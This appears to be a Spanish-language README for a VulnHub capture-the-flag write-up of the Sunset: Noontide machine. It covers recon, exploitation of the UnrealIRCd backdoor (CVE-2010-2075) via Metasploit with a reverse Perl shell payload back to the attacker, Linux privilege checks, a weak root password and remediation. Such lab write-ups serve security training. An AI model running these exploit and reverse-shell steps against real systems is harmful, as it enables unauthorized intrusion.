
Descripción Evaluación profesional de pruebas de penetración de la máquina Sunset: Noontide de VulnHub, que abarca reconocimiento, enumeración de servicios, explotación de CVE-2010-2075, post-explotación, escalada de privilegios y compromiso total del sistema.
Una evaluación profesional de pruebas de penetración y guía de CTF de Sunset: Noontide, una máquina intencionalmente vulnerable de VulnHub.
Este proyecto documenta el ciclo de vida completo de las pruebas de penetración, incluyendo reconocimiento, enumeración de servicios, investigación de vulnerabilidades, explotación, acceso inicial, post-explotación, escalada de privilegios, prueba de compromiso, evaluación de riesgos, mapeo de MITRE ATT&CK y remediación.
⚠️ Descargo de responsabilidad: Esta evaluación se realizó contra una máquina intencionalmente vulnerable en un entorno de laboratorio autorizado. Las técnicas y comandos documentados aquí están destinados únicamente a sistemas para los cuales se ha obtenido autorización explícita.
| Componente | Detalles |
|---|---|
| Objetivo | Sunset: Noontide |
| Plataforma | VulnHub |
| IP Objetivo | 10.106.186.186 |
| Nombre de Host Objetivo | noontide |
| SO Objetivo | Debian GNU/Linux 10 (Buster) |
| Arquitectura | x86_64 |
| Plataforma Atacante | Kali Linux |
| IP Atacante | 10.106.186.204 |
| Tipo de Evaluación | Evaluación de Laboratorio Autorizada |
| Riesgo General | CRÍTICO |
| Resultado de la Evaluación | Compromiso Total del Sistema |
Descubrimiento del Objetivo → Enumeración con Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Explotación con Metasploit → Shell de Comandos Remota → Shell como server → Post-Explotación en Linux → Credencial Root Débil → su root → UID 0 / Acceso Root → Archivos de Prueba de Usuario y Root
Se realizó un descubrimiento de red inicial para identificar el objetivo vulnerable.
El objetivo fue finalmente identificado como:
10.106.186.186
Durante el reconocimiento, 10.106.186.142 fue identificado como la puerta de enlace predeterminada en lugar del objetivo previsto.
Esto resalta la importancia de identificar correctamente el objetivo antes de realizar pruebas de seguridad adicionales, particularmente en una red de laboratorio puenteada o compartida.
Se realizó la detección de servicios y versiones con Nmap contra el objetivo usando:
nmap -sV 10.106.186.186
El servicio expuesto significativo identificado durante la evaluación fue:
6667/tcp open irc UnrealIRCd
Luego se realizó un escaneo más detallado usando:
nmap -sC -sV -Pn -p 6667 10.106.186.186
El servicio fue identificado como:
UnrealIRCd 3.2.8.1
El servicio IRC también reportó:
irc.foonet.com
El servicio UnrealIRCd expuesto se convirtió en la superficie de ataque principal investigada durante la evaluación.
Se utilizó SearchSploit para investigar vulnerabilidades documentadas públicamente asociadas con la versión de UnrealIRCd descubierta.
Comando:
searchsploit UnrealIRCd 3.2.8.1
El resultado relevante fue:
UnrealIRCd 3.2.8.1 - Backdoor Command Exec
linux/remote/16922.rb
La vulnerabilidad fue identificada como:
CVE-2010-2075
Ejecución de Comandos por Backdoor en UnrealIRCd 3.2.8.1
Crítica
Ejecución Remota de Comandos
La explotación exitosa del servicio vulnerable permite a un atacante ejecutar comandos remotamente en el sistema objetivo.
El servicio IRC vulnerable fue explotado usando el Framework Metasploit.
El módulo seleccionado fue:
exploit/unix/irc/unreal_ircd_3281_backdoor
Configuración de ejemplo:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 10.106.186.186
Los intentos iniciales de payload no produjeron una sesión utilizable.
Posteriormente se seleccionó un payload compatible de Perl inverso para Unix:
set payload cmd/unix/reverse_perl
set LHOST 10.106.186.204
set LPORT 4444
run
Metasploit reportó que el objetivo parecía vulnerable y abrió exitosamente una sesión de shell de comandos.
La shell obtenida fue verificada usando:
whoami
Resultado:
server
Esto confirmó la ejecución remota de comandos exitosa como la cuenta server.
El directorio de trabajo inicial fue:
/home/server/irc/Unreal3.2
En esta etapa, la evaluación progresó desde la explotación remota del servicio hasta la enumeración local de post-explotación.
Después de obtener la shell, se realizó la enumeración estándar de Linux para comprender el host comprometido e identificar posibles rutas de escalada de privilegios.
Comando:
id
Resultado:
uid=1000(server) gid=1000(server)
La cuenta era un usuario no root.
Comando:
hostname
Resultado:
noontide
Comando:
uname -a
Resultado:
Linux noontide 4.19.0-10-amd64 x86_64
Comando:
cat /etc/os-release
Resultado:
Debian GNU/Linux 10 (buster)
Estos comandos establecieron la identidad actual, el nombre de host, la versión del kernel, el sistema operativo y la configuración general del sistema.
Se realizaron varias verificaciones estándar de escalada de privilegios en Linux.
Comando:
find / -perm -4000 -type f 2>/dev/null
Se identificaron binarios SUID estándar como passwd, chsh, mount, umount, su, chfn, newgrp y gpasswd.
No se identificó ningún binario SUID personalizado o anómalo obvio como el vector de escalada exitoso.
Comando:
sudo -l
No se identificó ninguna ruta útil de escalada de privilegios basada en sudo a partir de la salida disponible.
Comandos:
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
Los trabajos programados observados eran trabajos de sistema estándar al estilo Debian.
No se identificó ningún trabajo cron de root escribible obvio.
Comando:
find / -writable -type f 2>/dev/null | head -100
Los resultados iniciales fueron principalmente pseudo-archivos de /proc y no revelaron un vector práctico de escalada de privilegios.
Comando:
getcap -r / 2>/dev/null
No se identificó ninguna escalada de privilegios útil basada en capacidades a partir de la salida resultante.
La ruta exitosa de escalada de privilegios se basó en las credenciales root intencionalmente débiles configuradas en la máquina vulnerable.
Se accedió a la cuenta root usando:
su root
Contraseña:
root
El acceso root fue luego verificado usando:
id
Resultado:
uid=0(root) gid=0(root) groups=0(root)
La identidad también fue confirmada usando:
whoami
Resultado:
root
Esto confirmó el control administrativo completo del sistema objetivo.
El archivo de prueba a nivel de usuario se encontraba en:
/home/server/local.txt
Comando:
cat /home/server/local.txt
Resultado:
c53c08b5bf2b0801c5d0c24149826a6e
El archivo de prueba a nivel de root se encontraba en:
/root/proof.txt
Comando:
cat /root/proof.txt
Resultado:
ab28c8ca8da1b9ffc2d702ac54221105
La prueba de root también devolvió:
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
La recuperación de ambos archivos de prueba confirma el compromiso exitoso desde el acceso remoto inicial hasta el control a nivel de root.
| ID | Hallazgo | Severidad | Impacto |
|---|---|---|---|
| VULN-01 | Backdoor en UnrealIRCd 3.2.8.1 | 🔴 Crítica | Ejecución Remota de Comandos |
| VULN-02 | Credenciales Root Débiles | 🔴 Crítica | Compromiso Administrativo Total |
Severidad: Crítica
Servicio Afectado: IRC / TCP 6667
Software Afectado: UnrealIRCd 3.2.8.1
CVE: CVE-2010-2075
Tipo de Ataque: Ejecución Remota de Comandos
Impacto Observado: Shell remota obtenida como server
El servicio UnrealIRCd expuesto estaba ejecutando una versión vulnerable asociada con una vulnerabilidad conocida de ejecución de comandos por backdoor.
La vulnerabilidad fue identificada mediante la enumeración de servicios y la investigación con SearchSploit y fue explotada exitosamente usando Metasploit.
Un atacante capaz de alcanzar el servicio IRC vulnerable podría ejecutar comandos remotamente y obtener acceso no autorizado al host.
Severidad: Crítica
Cuenta Afectada: root
Credencial Observada: root / root
Impacto Observado: Acceso administrativo UID 0
La cuenta root estaba configurada con una credencial extremadamente débil.
Después de obtener una shell local como server, se accedió a la cuenta root usando la credencial débil y se verificó con UID 0.
Un atacante que obtiene acceso a la shell local puede usar la credencial root débil para obtener el control completo del sistema operativo.
Reemplace la instalación vulnerable de UnrealIRCd con una versión confiable y soportada.
Verifique la integridad del software y la procedencia del paquete antes del despliegue.
Si la integridad o procedencia del software es incierta, reconstruya el sistema usando medios de instalación confiables y paquetes verificados.
Reemplace las credenciales predeterminadas y débiles con credenciales administrativas fuertes y únicas.
No use contraseñas simples como root.
Si IRC es necesario, restrinja el acceso usando:
Mantenga un proceso documentado de gestión de parches para el sistema operativo y todos los servicios expuestos.
Registre y revise:
El host Sunset: Noontide fue comprometido exitosamente desde el acceso de red inicial hasta el control completo a nivel de root.
La vulnerabilidad principal de acceso inicial fue el backdoor de UnrealIRCd 3.2.8.1 (CVE-2010-2075).
La vulnerabilidad proporcionó ejecución remota de comandos y resultó en una shell inicial como la cuenta server.
Luego se realizó la enumeración de post-explotación, incluyendo verificaciones de SUID, sudo, cron, archivos escribibles, capacidades de Linux, identidad, sistema operativo y sistema de archivos.
Estas verificaciones no identificaron la ruta de escalada exitosa.
El acceso administrativo completo se logró finalmente a través de las credenciales root débiles de la máquina.
La recuperación exitosa de ambos archivos de prueba, a nivel de usuario y de root, confirmó el compromiso total del sistema.
CRÍTICO — Compromiso Total del Sistema Logrado
Se incluye un informe detallado y profesional de pruebas de penetración con este proyecto:
Sunset-Noontide-Penetration-Testing-Report.pdf
El informe contiene:
Estructura sugerida del repositorio:
sunset-noontide-pentesting/
├── README.md
├── Sunset-Noontide-Penetration-Testing-Report.pdf
└── evidence/
├── 01-target-discovery.png
├── 02-nmap-enumeration.png
├── 03-searchsploit.png
├── 04-metasploit-exploitation.png
├── 05-initial-shell.png
├── 06-post-exploitation.png
├── 07-privilege-escalation.png
└── 08-root-proof.png
Las capturas de pantalla deben contener únicamente información del entorno de laboratorio autorizado.
Esta evaluación proporcionó experiencia práctica en:
Este repositorio está destinado estrictamente a:
Las técnicas documentadas en este repositorio deben realizarse únicamente contra sistemas para los cuales se ha obtenido autorización explícita.
No use estas técnicas contra sistemas de producción, infraestructura pública o sistemas de terceros sin permiso.
Alen Sales K S
Ciberseguridad | Pruebas de Penetración | SOC | Seguridad de Redes
GitHub: https://github.com/zales2004
Sunset: Noontide demuestra un flujo de trabajo completo de pruebas de penetración:
Reconocimiento → Enumeración → Investigación de Vulnerabilidades → Explotación → Acceso Inicial → Post-Explotación → Escalada de Privilegios → Acceso Root → Recolección de Evidencia → Evaluación de Riesgos → Reporte de Seguridad
Resultado de la Evaluación: CRÍTICO — Compromiso Total del Sistema Logrado
| Técnica | ID | Actividad Observada |
|---|
| Network Service Scanning | T1046 | Enumeración con Nmap |
| Exploit Public-Facing Application | T1190 | Explotación del servicio UnrealIRCd expuesto |
| Command and Scripting Interpreter | T1059 | Shell de comandos remota |
| Valid Accounts | T1078 | Uso de credenciales root |
| Account Discovery | T1087 | Enumeración de identidad y usuarios |
| System Information Discovery | T1082 | uname y /etc/os-release |
| File and Directory Discovery | T1083 | Enumeración del sistema de archivos |
| Scheduled Task/Job Discovery | T1053 | Enumeración de cron |
| Permission Groups Discovery | T1069 | id y enumeración de grupos |
| Fase | Actividades |
|---|
| Reconocimiento | Descubrimiento de red e identificación del objetivo |
| Enumeración | Detección de servicios/versiones con Nmap |
| Investigación de Vulnerabilidades | Identificación de módulos con SearchSploit y Metasploit |
| Explotación | Explotación del backdoor de UnrealIRCd |
| Acceso Inicial | Shell de comandos como server |
| Post-Explotación | Enumeración de identidad, SO, sistema de archivos y privilegios |
| Escalada de Privilegios | Verificaciones de SUID, sudo, cron, archivos escribibles y capacidades |
| Recolección de Evidencia | Archivos de prueba de usuario y root |
| Reporte | Hallazgos, análisis de riesgos y remediación |
| Objetivo | Estado |
|---|
| Objetivo Identificado | ✅ PASS |
| Servicio Expuesto Identificado | ✅ PASS |
| Versión Vulnerable Identificada | ✅ PASS |
| CVE Identificado | ✅ PASS |
| Ejecución Remota de Comandos | ✅ PASS |
Shell Inicial como server | ✅ PASS |
| Prueba de Usuario Recuperada | ✅ PASS |
| Escalada de Privilegios | ✅ PASS |
| Acceso Root Verificado | ✅ PASS |
| Prueba de Root Recuperada | ✅ PASS |